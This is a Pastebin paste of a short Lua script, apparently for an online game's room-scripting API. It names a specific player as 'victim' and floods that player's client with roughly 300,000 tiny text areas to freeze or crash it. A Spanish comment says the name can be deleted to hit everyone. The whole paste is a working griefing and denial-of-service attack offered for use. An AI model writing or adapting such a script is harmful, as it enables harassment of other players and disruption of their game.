Advertisement
Guest User

Untitled

a guest
Nov 14th, 2018
116
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. victim = "Mistercat#4067" --Aquí cambialo por el nombre de tu victima, si quieres que afecte a todos solo borralo ajjj
  2.  
  3. function wait(ms)
  4. local start = os.time()
  5. repeat until os.time() > start + ms
  6. end
  7. wait(0) -- That will allocate you 3 seconds to run out of the room. RUN FOREST RUN!
  8.  
  9. number = 0
  10. for y=5,400 do
  11. for x=5,780 do
  12. ui.addTextArea(number,"insert your text here, doesn't matter what text",victim,x,y,1,1,nil,nil,nil,true)
  13. number = number + 1
  14. end
  15. end
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement